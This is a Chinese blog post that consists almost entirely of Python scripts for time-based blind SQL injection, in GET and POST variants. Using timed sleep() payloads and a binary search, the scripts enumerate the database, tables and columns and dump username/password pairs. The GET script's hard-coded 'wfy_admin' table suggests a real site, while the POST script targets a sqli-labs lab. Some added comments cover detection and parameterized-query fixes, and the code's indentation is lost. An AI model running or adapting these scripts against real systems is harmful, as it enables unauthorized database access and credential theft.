SQL时间盲注——二分法
一、噢噢噢……时间盲注比盲注还费手,所以我还是用脚本吧。本来是上次就应该写好的,但是奈何自己犯傻了,用初始时间去减结束时间,然后的结果相信大家都知道了……
SQL时间盲注——GET注入
二、还是老样子,使用的是大佬的脚本进行改版的,反正自从看了大佬的脚本,也差不多会写了……直接上代码吧,反正相信大家都能看懂
import time
import requests
# Placeholder target. The probe text is appended straight onto this string, so the
# injection point is the id query parameter of a GET request.
url = "http://xxx.com/?id=1"
def getDatabase(): # fetch the current database name with a time-based blind probe
# NOTE(review): indentation was lost in this paste. The reading below (for -> while,
# with the end-of-string break and the append at the for level) is the one that
# makes the algorithm coherent — confirm against the original file.
# Detection/mitigation view: this emits hundreds of near-identical GETs whose id
# parameter carries "if(ascii(substr(" and "sleep(", roughly half of them taking
# 3 s or more. A parameterized query for id on the server side stops the probe.
# make url refer to the module-level variable
global url
ans = ""
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# one request per step: the injected IF makes the server sleep(3) when the
# character's ASCII code is below mid and return immediately otherwise
payload = url + "' and if(ascii(substr((select database()),{0},1))<{1},sleep(3),1) -- p".format(i, mid)
# print(payload) # for debugging
# the elapsed time (network round trip included) is the only signal read
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# low == high here: mid is the smallest bound with ascii < mid, so the character
# is mid - 1. Converging onto a range edge presumably means the string has ended
# (or holds a non-printable byte), so stop.
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("database is -> " + ans)
def getTable(): # fetch one table name of the current schema with a time-based blind probe
# NOTE(review): indentation was lost in this paste; the nesting assumed below is
# for -> while, with the break and the append at the for level — confirm.
global url
ans = ""
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# "limit 0,1" means only the first table of the current schema is read;
# the information_schema access itself is a useful detection signal
payload = url + "' and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),{0},1))<{1},sleep(3),1) -- p".format(
i, mid)
# print(payload) # for debugging
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# converged: the character is mid - 1; a range edge presumably marks end of string
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("table is -> " + ans)
# return the table name; it is a plain str, which the __main__ block splits on ','
return ans
def getColumn(TBname): # fetch the column names of TBname with a time-based blind probe
# NOTE(review): indentation was lost in this paste; the nesting assumed below is
# for -> while, with the break and the append at the for level — confirm.
global url
ans = ''
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# TBname is interpolated into the probe; group_concat folds all column names
# of that table into one string that is read one character at a time
payload = url + "' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{0}'),{1},1))<{2},sleep(3),1) -- p".format(
TBname, i, mid)
print(payload) # debug output: every probe is echoed
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# converged: the character is mid - 1; a range edge presumably marks end of string
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("column is -> " + ans)
# return the comma-joined column names as one str
return ans
def dumpTable(): # read the contents of a hard-coded table with a time-based blind probe
# NOTE(review): indentation was lost in this paste; the nesting assumed below is
# for -> while, with the break and the append at the for level — confirm.
global url
ans = ''
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# table and columns are hard-coded here (wfy_admin / username, password);
# both columns sit in one group_concat argument list, so the two values of a row
# come out with nothing between them (MySQL behaviour — verify)
payload = url + "' and if(ascii(substr((select group_concat(username,password) from wfy_admin),{0},1))<{1},sleep(3),1) -- p".format(
i, mid)
print(payload) # debug output: every probe is echoed
start_time = time.time()
requests.get(payload)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# converged: the character is mid - 1; a range edge presumably marks end of string
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("dumpTable is -> " + ans)
if __name__ == "__main__":
# Entry point. The enumeration chain (database -> tables -> columns) is left
# commented out; only the hard-coded dumpTable() runs.
# # getDatabase()
# TBname = getTable()
# # print(type(TBname)) shows it is a str; debug only
# TBnames = []
# TBnames.append(TBname.split(','))
# # append() produced a nested list, so unwrap it to a flat list
# TBnames = TBnames[0]
# print(TBnames)
# TBlen = len(TBnames)
# for i in range(0, TBlen):
# TBname = TBnames[i]
# # print(TBname)
# getColumn(TBname)
# if i == TBlen - 1:
# break
dumpTable()
运行结果就不放了。
SQL时间盲注——POST注入
import requests
import time
# Lab target: a sqli-labs instance (Less-15) on a private-range address. Here the
# probe travels in the POST body, not in the URL.
url = "http://192.168.59.150/sqli-labs/Less-15/"
def getDatabase(): # fetch the current database name with a time-based blind probe (POST variant)
# NOTE(review): indentation was lost in this paste. The reading below (for -> while,
# with the end-of-string break and the append at the for level) is the one that
# makes the algorithm coherent — confirm against the original file.
# Detection/mitigation view: the payload rides in the uname field of the POST body,
# so it never shows up in URL-only access logs; spotting it needs request-body
# inspection or database-side monitoring of sleep()/slow queries. A parameterized
# query for uname on the server side removes the issue.
# make url refer to the module-level variable
global url
ans = ''
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# "admin'" closes the quoted uname value; the injected IF then makes the server
# sleep(3) when the character's ASCII code is below mid
payload = "admin' and if(ascii(substr((select database()),{0},1))<{1},sleep(3),1) -- p".format(i, mid)
# print(payload) # for debugging
# passwd and submit are presumably just the filler fields the login form expects
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
# the elapsed time (network round trip included) is the only signal read
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# low == high here: mid is the smallest bound with ascii < mid, so the character
# is mid - 1. Converging onto a range edge presumably means the string has ended
# (or holds a non-printable byte), so stop.
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("database is -> " + ans)
def getTable(): # fetch all table names of the current schema with a time-based blind probe (POST variant)
# NOTE(review): indentation was lost in this paste; the nesting assumed below is
# for -> while, with the break and the append at the for level — confirm.
global url
ans = ""
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# unlike the GET version, group_concat folds every table name of the current
# schema into one string; the information_schema access is a detection signal
payload = 'admin\' and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))<{1},sleep(3),1) -- p'.format(
i, mid)
# print(payload) # for debugging
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# converged: the character is mid - 1; a range edge presumably marks end of string
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("table is -> " + ans)
# return the comma-joined table names as one str; the __main__ block splits it on ','
return ans
def getColumn(TBname): # fetch the column names of TBname with a time-based blind probe (POST variant)
# NOTE(review): indentation was lost in this paste; the nesting assumed below is
# for -> while, with the break and the append at the for level — confirm.
global url
ans = ''
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# TBname is interpolated into the probe; group_concat folds all column names
# of that table into one string that is read one character at a time
payload = "admin' and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='{0}'),{1},1))<{2},sleep(3),1) -- p".format(
TBname, i, mid)
# print(payload) # for debugging
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# converged: the character is mid - 1; a range edge presumably marks end of string
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("column is -> " + ans)
# return the comma-joined column names as one str
return ans
def dumpTable(): # read the contents of the hard-coded users table with a time-based blind probe (POST variant)
# NOTE(review): indentation was lost in this paste; the nesting assumed below is
# for -> while, with the break and the append at the for level — confirm.
global url
ans = ''
# i is the 1-based character position passed to substr(); 1000 is only a hard cap
for i in range(1, 1000):
# binary search over the printable ASCII range [32, 128)
low = 32
high = 128
mid = (low + high) // 2
while low < high:
# table and columns are hard-coded here (users / username, password); both
# columns sit in one group_concat argument list, so the two values of a row
# come out with nothing between them (MySQL behaviour — verify)
payload = "admin' and if(ascii(substr((select group_concat(username,password) from users),{0},1))<{1},sleep(3),1) -- p".format(
i, mid)
# print(payload) # for debugging
data = {"uname": payload, "passwd": "admin", "submit": "Submit"}
start_time = time.time()
requests.post(url, data)
end_time = time.time()
use_time = end_time - start_time
# a delay of 3 s or more means the injected condition evaluated true (ascii < mid)
if use_time >= 3:
high = mid
else:
low = mid + 1
mid = (low + high) // 2
# converged: the character is mid - 1; a range edge presumably marks end of string
if mid <= 32 or mid >= 127:
break
ans += chr(mid - 1)
print("dumpTable is -> " + ans)
if __name__ == "__main__":
# Entry point. The enumeration chain (database -> tables -> columns) is left
# commented out; only the hard-coded dumpTable() runs.
# # getDatabase()
# TBname = getTable()
# # print(type(TBname)) shows it is a str; debug only
# TBnames = []
# TBnames.append(TBname.split(','))
# # append() produced a nested list, so unwrap it to a flat list
# TBnames = TBnames[0]
# # print(TBnames)
# TBlen = len(TBnames)
# for i in range(0,TBlen):
# TBname = TBnames[i]
# # print(TBname)
# getColumn(TBname)
# if i == TBlen - 1:
# break
dumpTable()
运行结果也不放了。